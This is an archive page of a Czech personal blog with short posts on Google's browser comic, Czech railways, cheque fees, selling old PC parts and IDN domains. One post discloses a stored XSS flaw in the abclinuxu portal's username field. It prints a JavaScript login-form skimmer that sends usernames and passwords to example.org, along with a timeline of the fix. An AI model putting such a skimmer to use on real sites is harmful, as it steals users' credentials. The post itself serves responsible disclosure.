Michal Čihař - Blog Archives for Misc

Jak vypadá Evropa podle Googlu?

Tak i Google bude mít vlastní prohlížeč. To už asi není žádná novinka a ví o tom skoro každý. Představení formou komiksu je poměrně zajímavý nápad a určitě zaujal dost lidí, které by jinak taková zpráva zanechala v klidu.

Chápu, že se jim nechtělo v Evropě kreslit všechny hranice, ale proč nejvíc míst, kde hranice chybí, je kolem německa? Že by nějaká připomínka na druhou světovou válku? Nebo že by si autor myslel, že v Evropě pořád ještě zuří? :-)

Sním či bdím

...aneb to už jinde jsme, to je jiná vesnice.

Tak se občas při projížďkách v blízkém okolí Prahy nestačím divit co za skvostné stavby tu vyrůstá. Nevím, proč vila bez "barokního" zábradlí, několika věžiček nebo alespoň soch lvů není dneska in, ale asi s tím těžko něco nadělám. Nicméně už delší dobu mě překvapují dvě stavby jako vystřižené z úplně jiných končin světa. Majitelé pravděpodobně chtěli něco originálního a tak v katalogu ukázali na tuto stavbu. Jaká škoda, že zrovna ani ne o kilometr dál si někdo vybral téměř to samé...

Prosím omluvte mizernou kvalitu obrázků, je to foceno mobilem.

Skončit nebo ne?

Poslední dobou už mi opravdu připadá, že tento portál není pro mne. Informace tu sice občas ještě nějaké najdu (obvykle když vypoví službu moje děravá paměť, která udrží maximálně informaci, že jsem tu o tom psal), ale jinak vývoj všeho okolo se mi už nějaký ten pátek nezamlouvá.

Update: Kdo chce sledovat můj aktuální blog, je vítán na blog.cihar.com .

Jediné čím se tento portál drží nad vodou je propracovaný systém, který mi umožní snadno zjistit, jestli někdo reagoval na moje komentáře (i když jiná možnost řazení než podle mého posledního komentáře by se hodila), vidět na první pohled, kde jsou nové příspěvky a podobné vymoženosti, které by člověk jinde nenašel.

Ale stačí to? Na nějakou návštěvnost určitě. Nicméně je také potřeba kvalitní obsah. Vybrat si z místní nabídky článků je čím dál tím těžší. Asi už moc věcí sleduji v angličtině. Blogy se už před pár měsíci zvrhly na žumpu, ve které se občas vyskytne něco hodnotného (což je pak dokonce občas převzato jako článek, nebo alespoň nápad pro něj).

S odstupem (tady mělo být časové období, ale jsem líný zjistit datum zavedení blogů) musím dát za pravdu Yetimu, že zavedení blogů je cesta ke zkáze. Vidím jak tu mizí lidé, jejihž názor jsem si rád přečetl, a přemýšlím jestli není čas je následovat. Asi už je na čase takové rozhodnutí udělat a čím dál tím víc si uvědomuji, že musí být stejné jako u lidí, kteří mi tu chybí.

Začnu totálním ignorováním naprosté většiny blogů, včetně mého vlastního, který už stejně poslední dobou žije jinde , zprávičky a články zatím zůstávají v RSS, uvidíme, jak často mě sem něco naláká. Uvidíme jestli bude abclinuxu následovat root s asi tak jednou mojí návštěvou za měsíc :-).

Zážitky s Českými drahami

Po dlouhé době jsem opět využil služeb Českých drah. Jako obvykle to člověka naplní různými zážitky.

Začalo to poměrně pozitivním zjištěním, že si člověk může koupit lístek pro kolo za 60 Kč a na ten pak kolo vozit dva dny. Ovšem kdyby ho bylo kam dát. V jízdním řádu jsem si vybral vlak se symbolem a popisem rozšířená přeprava spoluzavazadel, především jízdních kol . Ve vlaku mi bylo průvodčím vysvětleno, že tento symbol v podstatě nic neznamená, protože on v tom vlaku prostě místa na kola jinde než na plošinách normálního vagónu nemá. No nějak jsme se tam naskládali a naštěstí nikdo mezitím nechtěl vystupovat, takže nevzniklo moc konfliktů.

Při zpáteční cestě jsem pak už jen pobaveně sledoval, jak jsou schopni synchronizovat zpoždění dvou navazujících vlaků, takže přes 20 minut zpoždění oba vlaky dorazily do přestupní stanice současně :-).

Proplacení šeku

Pokouším se prokousat weby českých bankovních institucí, abych zjistil, kde mi z mého šeku zbyde nejvíc peněz :-). Nečekal jsem, že se jedná o tak složitý úkol. Většinou se člověk ukliká k smrti, než tuto informaci objeví.

Nabídky začínají na úžasných podmínkách jako 2 % z částky šeku, min. 1 000 Kč , které člověka spíš lákají k tomu si ten kousek papíru nechat. Moje banka mi nabízí 1 %, min. 100,-, max. 3000,- , třeba u eBanky je to velmi podobné, jen limity jsou nižší - 1%, min. 50, max. 1 500 . Jinde si zase nehrají na procenta a prostě si naúčtují 650 Kč za šek . Nějak se v tom začínám ztrácet :-).

Tak nějak doufám, že tu někdo podobný problém řešil. Třeba mi poradí, kde ten kousek papíru přeměnit na peníze s co nejmenšími desátky věnovanými bance :-).

Jak ukrást hesla uživatelům abclinuxu?

Když tak řeším bezpečností chyby v phpMyAdminovi, napadlo mě jak jsou proti podobným věcem zabezpečené portály. Protože dost často používám abclinuxu, tak přišlo první na mušku :-).

Předem podotýkám, že tento článek byl nejdříve dán k dispozici adminům, takže doufám, že v době zveřejnění už není možné toto provést.

Většina prohlížečů dnes umí javascript, který se dá dělat spousta zajímavých věcí. Třeba přidat javascript na obsluhu nějaké událost nebo posílat XML HTTP requesty . Bystřejším již možná dochází, že pokud si můžu vložit vlastní javascript, není žádný problém odchytit odesílání přihlašovacího formuláře. Kdo nevěří, může si zkusit následující ukázku (ta heslo jenom zobrazí, ale to už je jenom detail):

 <script type="text/javascript">
<!--
function process() {
    p = document.getElementById('pwd').value;
    u = document.getElementById('usr').value;
    document.getElementById('ls_prepinac').innerHTML = 
        '<img src="http://example.org/?u=' + 
        u + '&p;=' + p + '"/>';
    window.alert('odeslano na example.org:\npass: ' + 
        p + '\n' + 'user: ' + u);
}
function load() {
    frm = document.forms[0];
    frm.onsubmit = process;
}
window.onload = load;
//-->
</script>

<div id="ls_prepinac">xx</div>
<form method="post">
<input type="text" name="u" id="usr">
<input type="password" name="p" id="pwd">
<input type="submit">
</form>

Teď už jenom zbývá jak dostat vlastní javascript na logovací stránku. Protože je samostatná, tak jediná věc, která je tam vidět z uživatelem ovlivnitelného obsahu jsou zprávičky. Obsah zpráviček je (aspoň v to doufám) kontrolován na dovolené html, ale ještě nám zbývá jeden zajímavý prvek. Tím je naše jméno, tam si můžeme napsat cokoliv co chceme, včetně javascriptu. Tak teď už jen zbývá doufat, že to moc lidí nezrealizovalo :-). Napsat zprávičku, která bude schválena až takový problém není a pak už je dílo dokonáno.

Jaké je řešení? Nedovolovat nikde javascript, dá se použít k mnoha nebezpečným věcem.

Stav chyby:

  • 2.5.2006 12:56 - oznámeno
  • 2.5.2006 13:14 - Leoš tvrdí že při zadání kontroluje <
  • 2.5.2006 13:26 - ukazuju mu že nekontroluje (kdo si v té době všiml "x" u mého jména, má 10 bodů za všímavost :-))
  • 2.5.2006 13:45 - Leoš uznává, že kontrola neexistuje
  • 2.5.2006 21:53 - opraveno

Spam je zdravý

Občas nechápu na co všechno se dají získat granty. Vědci z University of Alberta vyzkoumali, že nevyžádaná pošta může mít dobrý vliv na zdravotní stav člověka . Posílat lidem nevyžádanou reklamu na zdravý způsob života a zkoumat jak je to ovlivní je vskuktu geniální nápad. Jenom je vidět. že dotyční asi moc zkušeností se spamem neměli, když jim prošel přes všechny filtry :-).

Jarní úklid

Nechcete někdo trochu postarší počítačové komponenty? Cena nebude vysoká, ba právě naopak. Hlavně se toho bordelu chci zbavit :-). Vše je samozřejmě funkční pod Linuxem (vybrané komponenty dokonce pro Linux certifikovány :-)).

Skoro sestava (nejraději dohromady):

  • Celeron 366MHz, slot 1
  • Motherboard s Intel 440BX chipsetem (2xISA, 5xPCI, 1XAGP, slot 1, 3xDIMM, 2xIDE, 1xFDD) (Zida BXe98-ATX)
  • Paměť 128 MiB, PC-133
  • Paměť 64 MiB, PC-100
  • ATX zdroj, 125W

ISA karty (hodí se do skoro sestavy):

  • Zvukovka Sound Maker 16IE
  • Radio karta Gemtek
  • Modem neznámé značky (prodáno)

Historická sestava, ani se jí po letech nechce nabootovat :-) (nejspíš by chtěla vyčistit od prachu) (prodáno) :

  • AT case + 200W zdroj
  • Cyrix 486/DX2/66 MHz
  • Nějaká deska
  • 12 MiB paměti
  • 460 MiB disk (nebo tak nějak)
  • VLB grafika Cirrus, 2MiB
  • ISA karta s porty (2xCOM, LPT, game)
  • ISA IDE řadič s porty (2xCOM, LPT, game)
  • ISA síťovka (NE2000)

Ostatní zbytky:

  • Externí modem (56 KiB)
  • CPU Pentium 133MHz (prodáno)
  • Floppy mechanika
  • Reproduktory k PC značky Targa
  • Cca 30 m UTP kabelu (s konektorama)

Tak to je prozatím vše, možná objevím ještě něco.

IDN - hračka nebo praktická věc?

Je sice pěkné, že můžu mít doménu se všemi nabodeníčky, ale má čihař.com vůbec smysl? Jednak se najde dost programů, které si s IDN ještě nerozumí, takže někteří uživatelé se na tuto doménu vůbec nedostanou, pak ale stejně všichni jsou zvyklí zadávat domény bez nabodeníček. Nebo aspoň všichni v mém okolí :-).

Přiznám se bez mučení, že doménu jsem zaregistroval hlavně abych si vyzkoušel jaké problémy s IDN můžou nastat. Pak jsem taky nechtěl, aby mi to náhodou nějaký spekulant nekoupil :-).

Jak jste na tom vy s IDN?

Blog split detected

Tak už došlo na to o čem jsem dříve psal . Z jednoho blogu se stávají dva. Jaké bude rozdělení příspěvků a kolik jich bude v obou nedokážu odhadnout, ale určitě drobné postřehy a upozornění týkající se mých programů (kterých zde stejně moc nebylo) budou pouze v angličitě (stejně většina publika umí anglicky). Kdo tedy nechce o nic přijít, nechť se podívá na blog.cihar.com , případně do své čtečky přidá RSS .

A až Leoš napíše podporu pro vlastní RSS, tak se zápisky budou objevovat i tady :-).